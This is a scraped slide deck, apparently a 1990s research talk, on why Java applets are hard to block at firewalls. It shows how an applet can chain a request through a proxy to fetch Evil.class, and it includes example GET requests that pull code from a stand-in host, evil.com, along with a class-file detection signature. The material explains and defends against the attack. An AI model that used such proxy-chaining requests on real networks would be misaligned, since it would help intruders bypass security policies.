Blocking Java Applets at the Firewall
Blocking Java Applets at the Firewall
Blocking Java Applets at the Firewall
- No tags were found...
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
<strong>Blocking</strong> <strong>Java</strong> <strong>Applets</strong> <strong>at</strong> <strong>the</strong><strong>Firewall</strong>D. Martin, BUS. Rajagopalan, BellcoreA. Rubin, AT&T Research
Why should applets be blocked?■ Insider <strong>at</strong>tacks are <strong>the</strong> worst.■ The ubiquity of <strong>Java</strong>-enabled browserseffectively transforms outsider <strong>at</strong>tacksinto insider <strong>at</strong>tacks.– “But isn’t this mitig<strong>at</strong>ed by <strong>the</strong> securityrestrictions imposed on applets?”
Yes, but...■ Sometimes <strong>the</strong> security mechanisms<strong>the</strong>mselves can be broken, penetr<strong>at</strong>ing<strong>the</strong> restrictions of <strong>the</strong> sandbox.[Princeton <strong>at</strong>tacks]■ And <strong>the</strong> mechanisms don’t prevent anapplet from enlisting <strong>the</strong> firewall’s helpin viol<strong>at</strong>ing <strong>the</strong> security policy.
Example policy & mechanismPolicy:<strong>Applets</strong> are only permitted to open “safe”TCP connections.Mechanism:The SecurityManager only allows outgoingTCP connections to <strong>the</strong> server th<strong>at</strong>delivered <strong>the</strong> applet.This isn’t enough!
1: ClassLoader starts obtainingEvil.classClassLoaderfido.xxx.comproxy.xxx.comOk, applet lives onfido.xxx.com
2. Netscape routes requestthrough proxy.xxx.comClassLoaderfido.xxx.comproxy.xxx.comFetching applet fromfido.xxx.com(via proxy.xxx.com)GET http://fido.xxx.com/http://evil.com/Evil.class HTTP/1.0
3. Proxy.xxx.com contacts itself asfido.xxx.comClassLoaderfido.xxx.comproxy.xxx.comStill fetching appletfrom fido.xxx.com(via proxy.xxx.com)GET http://evil.com/Evil.class HTTP/1.0
4. Fido.xxx.com fetches Evil.classfrom evil.com and delivers it toproxy.xxx.com and <strong>the</strong>ClassLoadervictimfido.xxx.comproxy.xxx.comNow receiving appletfrom fido.xxx.com(via proxy.xxx.com)0x CA FE BA BE 00 03 ...evil.com
A Bump in <strong>the</strong> Net■ The applet came from fido.xxx.com, so itmay “only” open TCP connections tofido.xxx.com.■ Fido.xxx.com is a proxy server designedto forward TCP streams toarbitrary destin<strong>at</strong>ions.■ This viol<strong>at</strong>es <strong>the</strong> securitypolicy.
How to block applets <strong>at</strong> <strong>the</strong>firewall■ Remove tags from HTML– Extremely difficult to get right.– Only possible str<strong>at</strong>egy for <strong>Java</strong>script &ActiveX.■ Detect <strong>Java</strong> class file sign<strong>at</strong>ure0xCA FE BA BE– Even this can be disguised.■ It’s not easy, and it’s getting harder.
Conclusions■ <strong>Applets</strong> can be a thre<strong>at</strong> even when <strong>the</strong><strong>Java</strong> security system is working.■ <strong>Firewall</strong>s can no longer trust insiders justbecause <strong>the</strong>y’re inside.– Au<strong>the</strong>ntic<strong>at</strong>e insiders.■ <strong>Blocking</strong> applets <strong>at</strong> <strong>the</strong> firewall is hard.■ General solutions involve changes <strong>at</strong> <strong>the</strong>workst<strong>at</strong>ion level, not just <strong>the</strong> firewall.
Change language